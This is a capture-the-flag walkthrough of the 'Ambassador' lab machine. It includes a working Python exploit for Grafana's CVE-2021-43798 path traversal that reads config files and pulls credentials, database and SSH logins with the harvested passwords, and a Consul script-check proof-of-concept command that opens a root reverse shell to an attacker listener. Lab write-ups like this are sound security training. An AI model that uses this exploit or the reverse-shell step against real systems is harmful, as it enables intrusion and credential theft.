Ambassador

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 10.129.228.56
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 05:49 EDT
Nmap scan report for 10.129.228.56
Host is up (0.015s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
3306/tcp open  mysql

Port 80

The only thing of note here is a mention of the user developer:

Other than that, there was not much here.

Grafana LFI -> Creds

Port 3000 (which nmap labelled ppp purely from its port table) was hosting a Grafana instance.

The version running here falls in the 8.x range affected by CVE-2021-43798, a path traversal in the plugin asset endpoint (/public/plugins/<plugin-id>/...) that was fixed in 8.3.1, 8.2.7, 8.1.8 and 8.0.7. searchsploit has a public exploit for it:

$ searchsploit grafana                
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Grafana 7.0.1 - Denial of Service (PoC)                    | linux/dos/48638.sh
Grafana 8.3.0 - Directory Traversal and Arbitrary File Rea | multiple/webapps/50581.py
----------------------------------------------------------- ---------------------------------

We can confirm that this works by reading an arbitrary file with it:

Grafana's main configuration file lives at /etc/grafana/grafana.ini, so that is the first file worth pulling. The admin password is set there in cleartext (the admin_user line is still commented out with ;, so the account is the default admin):

# default admin user, created on startup
;admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = messageInABottle685427

With this, we can log in to the admin panel as admin:

In the data source configuration, there is a MySQL data source provisioned from a file called mysql.yaml.

Provisioned data sources cannot be edited from the UI, and it does not display the credentials:

However, we can use the LFI to read the file from disk instead.

Based on the Grafana provisioning documentation, data source definitions live under /etc/grafana/provisioning/datasources, so the file to request is /etc/grafana/provisioning/datasources/mysql.yaml.
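The two file reads above (grafana.ini for the admin password, then the provisioning YAML for the database user) can be scripted directly against the traversal. The block below is an added example written for this writeup, not the searchsploit PoC or anything from Grafana itself. It assumes the target from the scan (10.129.228.56:3000), uses the core panel plugin alertlist as the plugin-id component of the path, and feeds its parsers constructed copies of the two files (the mysql.yaml values are placeholders, not the real ones):

```python
import http.client
import re

# Hypothetical target values for this example; the box in the writeup was 10.129.228.56:3000.
TARGET_HOST = "10.129.228.56"
TARGET_PORT = 3000

# The first path component must be a plugin bundled with the install;
# "alertlist" is a core panel plugin shipped with every Grafana 8.x.
PLUGIN = "alertlist"
TRAVERSAL_DEPTH = 8


def traversal_path(target_file, plugin=PLUGIN, depth=TRAVERSAL_DEPTH):
    """Raw request path for CVE-2021-43798: the plugin asset handler joins
    the plugin directory with the rest of the URL without cleaning '..'
    segments, so enough '../' components walk out to the filesystem root."""
    return f"/public/plugins/{plugin}/" + "../" * depth + target_file.lstrip("/")


def fetch_file(target_file):
    """Send the request with http.client so the '../' segments go out
    verbatim; higher-level clients may normalise them away first."""
    conn = http.client.HTTPConnection(TARGET_HOST, TARGET_PORT, timeout=10)
    conn.request("GET", traversal_path(target_file))
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    if resp.status != 200:
        raise RuntimeError(f"{target_file}: HTTP {resp.status}")
    return body


def active_ini_values(ini_text):
    """Parse grafana.ini into {section: {key: value}}, skipping lines
    commented out with ';' or '#'. Grafana ships its defaults as ';key = value'
    lines, so only uncommented keys are actually in effect."""
    values = {}
    section = "DEFAULT"
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        if sep:
            values.setdefault(section, {})[key.strip()] = value.strip()
    return values


def datasource_credentials(yaml_text):
    """Return (name, user, password) for each entry in a provisioning YAML.
    Grafana accepts the password either as a top-level 'password:' or under
    'secureJsonData:'; a flat regex scan of each '- name:' block covers both
    without needing a YAML library."""
    creds = []
    for block in re.split(r"\n\s*-\s+name:", "\n" + yaml_text)[1:]:
        name = block.split("\n", 1)[0].strip()
        user = re.search(r"^\s*user:\s*(\S+)", block, re.M)
        password = re.search(r"^\s*password:\s*(\S+)", block, re.M)
        creds.append((name, user.group(1) if user else None,
                      password.group(1) if password else None))
    return creds


# Constructed samples in the shape of the two files pulled in the writeup
# (the real mysql.yaml values are deliberately not reproduced here).
SAMPLE_INI = """\
[security]
# default admin user, created on startup
;admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = messageInABottle685427
"""

SAMPLE_YAML = """\
apiVersion: 1

datasources:
  - name: mysql.yaml
    type: mysql
    url: 127.0.0.1:3306
    database: grafana
    user: grafana
    secureJsonData:
      password: example-password-not-the-real-one
"""


if __name__ == "__main__":
    security = active_ini_values(fetch_file("/etc/grafana/grafana.ini")).get("security", {})
    print("admin_password =", security.get("admin_password"))
    yaml = fetch_file("/etc/grafana/provisioning/datasources/mysql.yaml")
    for name, user, password in datasource_credentials(yaml):
        print(f"datasource {name}: {user}:{password}")
```

The request is built with http.client rather than a higher-level library so the ../ segments are sent exactly as written; a client that normalises the path before sending would silently turn the traversal into a request for a plugin asset that does not exist.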

That file contains the credentials of the grafana database user, which also work against the MySQL service exposed on port 3306:

$ mysql -u grafana -h 10.129.228.56 -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

The whackywidget database has a users table holding a base64-encoded password for developer:

MySQL [whackywidget]> select * from users\g
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+

$ echo YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== | base64 -d
anEnglishManInNewYork027468

We can then log in as developer over SSH with this password.

Privilege Escalation

Consul Token -> RCE

I was wondering where that whackywidget database came from and why it had the password for the user instead of the grafana database. Within the /opt directory, we can find some additional folders:

developer@ambassador:/opt$ ll
total 16
drwxr-xr-x  4 root   root   4096 Sep  1  2022 ./
drwxr-xr-x 20 root   root   4096 Sep 15  2022 ../
drwxr-xr-x  4 consul consul 4096 Mar 13  2022 consul/
drwxrwxr-x  5 root   root   4096 Mar 13  2022 my-app/

developer@ambassador:/opt/my-app$ ls
env  whackywidget

Consul is HashiCorp's service discovery and key/value store; the app uses its KV store for its production configuration:

The agent on the machine exposes its HTTP API on port 8500, bound to localhost only (as are the RPC and gossip ports 8300-8302), and we can also find out the version running:

developer@ambassador:/opt/my-app/env$ netstat -tulon
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8300          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8301          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8302          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8500          0.0.0.0:*               LISTEN      off (0.00/0/0)

developer@ambassador:/opt/my-app/env$ consul --version
Consul v1.13.2

There are public exploits for this. They do not rely on a bug in 1.13.2 as such: Consul's agent API lets a caller register a service with a script health check, and when the agent is configured with script checks enabled it runs that check command as its own user (root here). The API requires a valid ACL token, though, so we first need to find one on the box. The /opt/my-app directory is a git repository:

developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13  2022 .
drwxr-xr-x 4 root root 4096 Sep  1  2022 ..
drwxrwxr-x 4 root root 4096 Mar 13  2022 env
drwxrwxr-x 8 root root 4096 Mar 14  2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13  2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13  2022 whackywidget

Checking the history shows the token being removed from a helper script; since git keeps the old version of the file, it is still recoverable:

developer@ambassador:/opt/my-app$ git log -p -2
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
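Review bot: dropping the hard-coded token from `consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD` does not retire it; the value stays readable in the repository history, so the token has to be revoked and reissued in Consul's ACL system, not just removed from the working tree. The new `consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD` line also runs unauthenticated if CONSUL_HTTP_TOKEN was never exported; the script should fail fast, e.g. `: "${CONSUL_HTTP_TOKEN:?export CONSUL_HTTP_TOKEN first}"`, instead of relying on the comment.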

Afterwards, run the PoC on the machine itself, since the API only listens on 127.0.0.1:8500, pointing it at a listener on our own host:

developer@ambassador:~$ python3 exploit_consul.py --rhost 127.0.0.1 --rport 8500 --lhost 10.10.14.13 --lport 443 --token bb03b43b-1d81-d62b-24b5-39540ee469b5

This gives us a reverse shell as root on the listener.
